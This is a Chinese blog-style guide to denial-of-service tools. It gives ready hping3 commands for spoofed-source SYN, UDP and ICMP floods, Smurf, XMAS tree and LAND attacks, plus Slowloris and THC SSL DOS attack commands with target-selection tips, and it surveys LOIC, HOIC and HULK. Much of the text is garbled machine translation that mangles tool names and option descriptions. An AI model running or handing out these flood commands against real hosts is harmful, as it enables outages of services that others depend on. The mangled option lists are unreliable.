宝塔服务器面板,一键全能部署及管理,送你10850元礼包,点我领取

dos攻击工具

dos攻击工具

综合工具

除了DDoS攻击外,全面的工具还可用于其他用途,如端口扫描、安全审核和防火墙。 其实,大多数综合工具开发的初衷不是DDoS,而是“网络检测或测试工具”

惠萍

Hping是一种对TCP/IP协议进行编码和解码的命令行开发工具,常用于测试网络和主机的安全。 此外,还可以做安全审计、防火墙测试等工具的标准工具; Hping命令行类似于常见的ping命令,但它不仅支持发送ICMP请求,还支持TCP、UDP和原始IP等协议。 Hping的特色是可以自定义数据包的各个部分。

Hping经常不作为网络攻击的工具使用,使用Hping可以用方便的金额构建DoS攻击。 例如ICMP洪水攻击、UDP洪水攻击、SYN洪水攻击等。

Hping的常见功能包括网络压力测试、防火墙测试和端口扫描。

手册:https://www.hi-Linux.com/posts/57862.html

-H——帮助显示此帮助

-V—版本显示版本

-C——发送数据包的数据项

以-i——间隔发送分组的间隔时间u即微秒) u x表示x微秒,例如-i u1000 ) )。

—i u10000高速别名每秒10个数据包) ) ) ) ) ) ) )。

—i u1000的高速别名每秒100个数据包) ) ) ) ) )。

flood快速发送数据包,不显示回复

-n——数字输出

-Q——安静安静模式

-i——接口名称否则为默认根接口) ) ) ) ) ) ) ) ) ) ) ) )。

-v——详细模式

-d——调试信息

– z -将bindctrlz绑定到ttl 默认为dst端口)

-Z—解除绑定ctrl z解除绑定

每次收到匹配的数据包时都会发出报警音

模式

默认模式TCP

-0-原始IP原始IP模式

-1—ICMP ICMP模式

-2——UDP UDP模式

-8——扫描扫描模式。

示例: hpingscan1- 30,70-90-swww.target.host

-9——听-听模式

知识产权

答—欺骗源地址

随机目标地址模式。 遇见那个人。

随机源地址的模式。 遇见那个人。

-T—TTL TTL 默认值为64 )

-n—ID ID 默认随机) ) ) ) ) ) ) ) ) )。

-w——win id按win*id字节排序

-r——rel relativize id字段用于估计主机通信量) ) ) ) ) )

-用比-f——更多的片段分割数据包。 可能通过弱ACL )

-x—morefrag设置更多片段标志

-Y—Dontfrag集非分段标志

– g -设置标志关闭片段的偏移

-m——mtu设置虚拟mtu。 也就是说,如果包大小大于mtu,则——为标志

– otos服务类型默认值为0x00 ),尝试tos帮助

-g——route具有记录路由选项和显示路由缓冲区的功能

lsrr松散源路由和日志路由

严格的-ssrr源根目录和日志路由

-h-IPproto仅在原始IP模式下设置IP协议字段

国际货币基金组织

– c-icmp类型ICP类型默认回显请求)

– k-icmp代码icmp代码默认值为0 )

强制将所有ICMP类型发送到ICMP 默认情况下仅发送支持的类型)

icmp GW设置用于icmp重定向的网关地址。 默认值为0.0.0.0 )

icmp ts别名icmpicmp type 13 icmp时间戳) ) ) ) ) ) ) ) )。

icmp地址别名icmpicmp类型17 icmp地址子网掩码) ) ) ) ) ) 0

icmp帮助显示其他icmp选项的帮助

UDP/TCP协议

-s-基地址端口的基地址源端口默认随机)

– pdestport [ ] destination port 默认值0 ) ctrl z inc/dec

-停止-k——源端口

-w—win winsize 默认值64 )

– o ——设置假TCP数据偏移,而不是tcphdr len/4 TCP偏移

-q—seqnum仅显示TCP序列号

-b-BadcksumIP校验和尝试发送错误的数据包

许多系统修复发送数据包的IP校验和

因此,会得到错误的UDP/TCP校验和。

-设置-m——setseqTCP序列号

设置-L-setackTCPack

设置-f-finfin标志

设置- s同步标志

-R——RST设置RST标志

-P——推送设置推送标记

设置- a-a缓存标志

>-U—URG设置URG标志

-x—xmas set x unused标志0x40)

-Y—Ymas设置Y未使用标志0x80)

–tcp exit code使用最后一个tcp->th_标志作为退出代码

–tcp mss使用给定值启用tcp mss选项

–tcp timestamp启用tcp timestamp选项来猜测hz/uptime

共同的

-d——数据数据大小默认值为0)

-e——文件中的文件数据

-E——签名加上“签名”

-j——以十六进制转储数据包

-j——打印转储可打印字符

-B——安全启用“安全”协议

-u——结束,告诉你什么时候——文件到达eof,并防止倒带。

-t——traceroute traceroute模式意味着——bind和——ttl 1)

–在traceroute模式下接收第一个非ICMP时,tr停止退出

–tr keep ttl保持源ttl固定,仅用于监视一个跃点

–tr no rtt不在traceroute模式下计算/显示rtt信息

ARS包描述新的、不稳定的)

–APD发送发送APD描述的数据包见docs/apd.txt)

Hping操作

上两张图是Hping3命令界面和目标192.168.2.191主机的拦包结果:

Hping命令使用的是 -i:是间隔100000微秒其中u是微秒单位)发送数据包的间隔时间

-0—RAWIP原始IP模式

-1—ICMP ICMP模式

-2—UDP UDP模式

-8—扫描扫描模式

-a:伪造源IP地址为xxx.xxx.xxx.xxx

SYN FloodingSYN洪水攻击)

hping3目标主机IP-iu微秒时间-S-a伪造的源IP

伪造IP的ICMP封包

hping3 目標主機IP -i u100000 -1 -a 偽造來源IP

SYN+FIN

hping3 目標主機IP -i u100000 -S -F -a 偽造來源IP

FIN+SYN+RSP+PSH+ACK+UDP

hping3 目标主机IP -i u100000 -F -S -R -A -U -a 伪造来源IP

伪造IP的UDP封包

hping3 目标主机IP -i u100000 -2 -a 伪造来源IP

上述的命令中,伪造了源IP向目标主机发送了UDP数据包

伪造IP内含数据代码

hping3 目标主机IP -i u100000 -d[封包数据] -E[文件名] -a[伪造源IP]

SMURF攻击

结合使用了IP欺骗和ICMP回复方法使大量网络传输充斥目标系统,引起目标系统拒绝为正常系统进行服务。

hping3 -1 -a 192.168.1.5 192.168.1.255

XMAS TREE攻击

hping3 -SFRP 目标IP

LAND攻击

hping3 -k -S -s 25 -p 25 -a 伪造源IP地址

用tcpdump的记录流量

PenTBox

兼容windows、mac os、Android;基于Ruby开发。

三个主体功能

密码算法工具

网络工具压力测试、溢出攻击)

Web安全测试工具

Zarp

Zarp是一款采用python编写的而网络攻击测试集成工具Zarp仅限运行在Linux平台,Zarp的主要接口是一个CLI驱动的图形界面。

启动Zarp.py

压力测试工具

LOIC

LOIC,低轨道离子炮;开源的网络压力测试工具。

Windows平台LOIC启动界面

LOIC的不足之处在于他不可以伪造源IP地址。

LOIC可以对目标发动TCP、UDP以及HTTP GET等洪水攻击

HOIC

HOIC,高轨道离子炮;是一款基于HTTP协议的开源DDoS工具,HOIC主要用于内部网络和外部服务器安全性和稳定性能测试;

HOIC可以发送多线程的HTTP FLOOD洪水攻击;同样额HOIC也同样无法隐藏源IP地址。

HULK

​HULK是一款基于Python的Web压力测试工具。HULK默认启动500线程对目标发起高频率的HTTP GET洪水攻击请求,独特之处在于,每一次的请求都是独一的,由此可以绕开服务器端采用缓存的防范措施。同时HULK也支持User-Agent和referer的伪造。

专业的攻击工具

Slowloris

Slowloris是一个Perl程序。也有Python的版本)

​Slowloris的使用较为简单,一般分为两个步骤:

首先是对目标进行探测:

perl slowloris.pl -dns 目标IP-port 目标端口号-test

​对目标进行探测的主要目的是获取目标服务器的连接时间,当目标服务器的时间超时小于166秒,工具运行会出现异常,所以建议选择超时时间大于200秒以上的目标。

测试中,首要是确定目标的对象IP,然后进行多次的超时时长的探测。

实施攻击

perl slowloris.pl -dns 目标IP -port 目标端口号 – timeout TTL

TTL指的是根据之前的探测,设置一个合适的超时时间;因为Slowloris攻击方法主要就是依靠超时占用对方资源而实现DoS攻击的目的,所以还是需要这只一个合适的超时时间的。

​在之前提过,该攻击方法是有不足的,只能针对部分的web服务端有效;目前收到影响的有:Apache1.x/2.x、dhttpd、GoAhead、WebServer、Squid等;而IIS则不受影响。

R.U.D.Y

​包容的樱桃采用一种慢速的HTTP POST请求的方式给目标发动攻击。与之前的Slowloris利用请求Header部分不同,包容的樱桃利用的是请求的body部分;因为服务器端会根据Content-Length字段的内容值持续等待,直到客户端数据发送完毕。

太繁琐,不用了。

THC SSL DOS

​THC SSL DOS 利用SSL中已知弱点而使其DoS;这种攻击是非对称的,一次客户请求就可以让服务端进行相当于客户端的15倍的CPU资源进行处理。

thc-ssl-dos –accept xxx.xxx.xxx.xxx [prot]xx

如果目标禁用或启动了安全的 rengotiation ,则会提示攻击失败。

利用THC SSL DOS工具,一台性能和带宽中等的主机就可以挑战高性能的服务器;攻击效果非常明显。